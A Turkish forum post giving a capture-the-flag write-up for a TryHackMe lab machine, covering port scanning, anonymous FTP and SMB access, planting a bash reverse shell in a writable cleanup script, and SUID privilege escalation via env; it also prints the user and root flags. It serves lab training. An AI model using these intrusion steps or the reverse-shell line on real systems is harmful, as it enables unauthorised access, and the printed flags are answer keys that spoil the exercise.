THM Anonymous CTF WriteUp

TheSenius

Kıdemli Üye
30 Ocak 2013
2,372
241
Bugün "anonymous" denen makinayı çözeceğiz. Sızma testi uygulaması için TryHackMe'de mevcuttur.
ctf link: https://tryhackme.com/room/anonymous
İlk başta Nmap taraması yapmamız lazım .
nmap -A -v ip adresi şeklinde arama yapıyoruz.
Açık olan Port bağlantısını bulduktan sonra ilk sorumuzun cvp bulduk.
tarama sonuçları link :
7far5dk.png





bckrxfb.png


sorularun cvpları :
Q.1. Enumerate the machine. How many ports are open?

4

Q.2. What service is running on port 21?

FTP

Q.3. What service is running on ports 139 and 445?

SMB

sonrasında ftp ile giriş yapacağız. giriş yaparken
kullanıcı adı anonymous şifre yok.

ftp bağlandıktan sonra ;

Kod:
ftp ip adresi
ls -la
cd scripts
ls -la
get clean.sh
get removed_files.log
get to_do.txt


g52q4p6.png




daha sonra bizden istediği smb için ;

Kod:
smbclient -L \\anonymous -I ip adresi 

sonra ls 

smbclient //ip adresi /pics
ls
get corgo2.jpg
get puppos.jpeg



fsif38q.png






hvbjido.png




Q.4. There’s a share on the user’s computer. What’s it called?

pics


şimdi ise ftp indirdiğimiz clean.sh içerisine netcat bağlantı için
Reverse Shell komutu yerleştireceğiz.



7sbue9i.png





lo6qyrh.png




nano clean.sh


atbdo5s.png

Kod:
[COLOR=Red]
bash -i >& /dev/tcp/ip adresi /port adresii  0>&1 [/COLOR]




sonra port bağlantısını sağladıktan sonra ls dediğimizde
user.txt görünüyor.
90d6f992585815ff991e68748c414740

daha sonra ;
Kod:
find / -perm -04000 -type f 2>/dev/null

yapacağız ve çıkan yerden env bakacaz

q9ium4g.png




daha sonra

Kod:
/usr/bin/env /bin/sh -p


cat /root/root.txt

4d930091c31a622a7ed10f27999af363
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.